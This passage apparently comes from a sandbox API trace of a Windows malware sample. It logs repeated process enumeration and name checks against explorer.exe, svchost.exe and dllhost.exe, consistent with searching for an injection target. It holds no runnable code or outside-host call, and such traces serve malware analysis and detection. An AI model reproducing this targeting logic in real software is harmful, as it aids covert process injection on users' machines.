(lpString1="knewdifferenceskaren.exe", lpString2="dllhost.exe") returned 1 [0221.593] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0221.594] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xec [0221.594] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0221.594] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0221.594] CloseHandle (hObject=0xec) returned 1 [0221.594] lstrcmpiA (lpString1="whenever.exe", lpString2="explorer.exe") returned 1 [0221.594] lstrcmpiA (lpString1="whenever.exe", lpString2="svchost.exe") returned 1 [0221.594] lstrcmpiA (lpString1="whenever.exe", lpString2="dllhost.exe") returned 1 [0221.594] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0221.595] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xec [0221.595] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0221.595] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0221.595] CloseHandle (hObject=0xec) returned 1 [0221.595] lstrcmpiA (lpString1="potentially.exe", lpString2="explorer.exe") returned 1 [0221.595] lstrcmpiA (lpString1="potentially.exe", lpString2="svchost.exe") returned -1 [0221.595] lstrcmpiA (lpString1="potentially.exe", lpString2="dllhost.exe") returned 1 [0221.595] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0221.595] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xec [0221.595] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0221.595] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0221.595] CloseHandle (hObject=0xec) returned 1 [0221.595] lstrcmpiA (lpString1="seeker.exe", lpString2="explorer.exe") returned 1 [0221.595] lstrcmpiA (lpString1="seeker.exe", lpString2="svchost.exe") returned -1 [0221.595] lstrcmpiA (lpString1="seeker.exe", lpString2="dllhost.exe") returned 1 [0221.595] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0221.596] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xec [0221.596] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0221.596] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0221.596] CloseHandle (hObject=0xec) returned 1 [0221.596] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="explorer.exe") returned 1 [0221.596] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="svchost.exe") returned -1 [0221.596] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="dllhost.exe") returned 1 [0221.596] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0221.597] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xec [0221.597] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0221.597] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0221.597] CloseHandle (hObject=0xec) returned 1 [0221.597] lstrcmpiA (lpString1="birth bean.exe", lpString2="explorer.exe") returned -1 [0221.597] lstrcmpiA (lpString1="birth bean.exe", lpString2="svchost.exe") returned -1 [0221.597] lstrcmpiA (lpString1="birth bean.exe", lpString2="dllhost.exe") returned -1 [0221.597] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0221.597] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xec [0221.597] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0221.597] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0221.597] CloseHandle (hObject=0xec) returned 1 [0221.598] lstrcmpiA (lpString1="ruby.exe", lpString2="explorer.exe") returned 1 [0221.598] lstrcmpiA (lpString1="ruby.exe", lpString2="svchost.exe") returned -1 [0221.598] lstrcmpiA (lpString1="ruby.exe", lpString2="dllhost.exe") returned 1 [0221.598] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0221.598] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xec [0221.598] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0221.598] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0221.598] CloseHandle (hObject=0xec) returned 1 [0221.598] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="explorer.exe") returned 1 [0221.598] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="svchost.exe") returned 1 [0221.598] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="dllhost.exe") returned 1 [0221.598] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0221.599] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xec [0221.599] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0221.599] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0221.599] CloseHandle (hObject=0xec) returned 1 [0221.599] lstrcmpiA (lpString1="smith.exe", lpString2="explorer.exe") returned 1 [0221.599] lstrcmpiA (lpString1="smith.exe", lpString2="svchost.exe") returned -1 [0221.599] lstrcmpiA (lpString1="smith.exe", lpString2="dllhost.exe") returned 1 [0221.599] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0221.600] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xec [0221.600] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0221.600] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0221.600] CloseHandle (hObject=0xec) returned 1 [0221.600] lstrcmpiA (lpString1="spicedespite.exe", lpString2="explorer.exe") returned 1 [0221.600] lstrcmpiA (lpString1="spicedespite.exe", lpString2="svchost.exe") returned -1 [0221.600] lstrcmpiA (lpString1="spicedespite.exe", lpString2="dllhost.exe") returned 1 [0221.600] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0221.600] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xec [0221.600] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0221.600] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0221.600] CloseHandle (hObject=0xec) returned 1 [0221.600] lstrcmpiA (lpString1="wooden.exe", lpString2="explorer.exe") returned 1 [0221.600] lstrcmpiA (lpString1="wooden.exe", lpString2="svchost.exe") returned 1 [0221.600] lstrcmpiA (lpString1="wooden.exe", lpString2="dllhost.exe") returned 1 [0221.600] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0221.601] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xec [0221.601] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0221.601] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0221.601] CloseHandle (hObject=0xec) returned 1 [0221.601] lstrcmpiA (lpString1="dallasr.exe", lpString2="explorer.exe") returned -1 [0221.601] lstrcmpiA (lpString1="dallasr.exe", lpString2="svchost.exe") returned -1 [0221.601] lstrcmpiA (lpString1="dallasr.exe", lpString2="dllhost.exe") returned -1 [0221.601] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0221.602] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xec [0221.602] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0221.602] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0221.602] CloseHandle (hObject=0xec) returned 1 [0221.602] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="explorer.exe") returned -1 [0221.602] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="svchost.exe") returned -1 [0221.602] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="dllhost.exe") returned -1 [0221.602] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0221.602] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xec [0221.602] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0221.602] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0221.602] CloseHandle (hObject=0xec) returned 1 [0221.602] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="explorer.exe") returned -1 [0221.602] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="svchost.exe") returned -1 [0221.603] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="dllhost.exe") returned -1 [0221.603] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0221.603] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xec [0221.603] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0221.603] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0221.603] CloseHandle (hObject=0xec) returned 1 [0221.603] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="explorer.exe") returned 1 [0221.603] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="svchost.exe") returned -1 [0221.603] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="dllhost.exe") returned 1 [0221.603] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0221.604] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xec [0221.604] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0221.604] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0221.604] CloseHandle (hObject=0xec) returned 1 [0221.604] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="explorer.exe") returned -1 [0221.604] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="svchost.exe") returned -1 [0221.604] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="dllhost.exe") returned 1 [0221.604] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0221.604] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xec [0221.605] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0221.605] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0221.605] CloseHandle (hObject=0xec) returned 1 [0221.605] lstrcmpiA (lpString1="population openings.exe", lpString2="explorer.exe") returned 1 [0221.605] lstrcmpiA (lpString1="population openings.exe", lpString2="svchost.exe") returned -1 [0221.605] lstrcmpiA (lpString1="population openings.exe", lpString2="dllhost.exe") returned 1 [0221.605] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0221.605] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0221.605] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.606] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0221.606] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0221.606] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0221.606] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.607] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0221.607] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0221.607] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0221.607] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0221.608] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xec [0221.608] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0221.608] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0221.608] CloseHandle (hObject=0xec) returned 1 [0221.608] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0221.608] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xec [0221.608] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0221.608] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0221.608] CloseHandle (hObject=0xec) returned 1 [0221.608] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0221.654] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0221.654] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0221.654] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xec [0221.654] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0221.654] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0221.654] CloseHandle (hObject=0xec) returned 1 [0221.654] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0221.654] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0221.655] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xec [0221.655] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0221.655] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0221.655] CloseHandle (hObject=0xec) returned 1 [0221.655] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0221.655] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0221.656] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x954) returned 0xec [0221.656] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0221.656] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0221.656] CloseHandle (hObject=0xec) returned 1 [0221.656] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0221.656] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5b8) returned 0xec [0221.656] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0221.656] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0221.657] CloseHandle (hObject=0xec) returned 1 [0221.657] lstrcmpiA (lpString1="gtjtdfe", lpString2="explorer.exe") returned 1 [0221.657] lstrcmpiA (lpString1="gtjtdfe", lpString2="svchost.exe") returned -1 [0221.657] lstrcmpiA (lpString1="gtjtdfe", lpString2="dllhost.exe") returned 1 [0221.657] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x6c0064, th32ProcessID=0x68006c, th32DefaultHeapID=0x73006f, th32ModuleID=0x2e0074, cntThreads=0x780065, th32ParentProcessID=0x65, pcPriClassBase=0, dwFlags=0x0, szExeFile="gtjtdfe")) returned 0 [0221.657] CloseHandle (hObject=0xe8) returned 1 [0221.657] Sleep (dwMilliseconds=0x3e8) [0222.684] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0222.686] Process32First (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0222.686] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0222.686] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0222.687] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0222.687] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0222.687] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0222.687] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0222.688] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0222.688] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0222.688] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0222.688] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0222.689] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0222.689] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0222.689] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0222.689] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0222.690] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0222.690] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0222.690] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0222.690] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 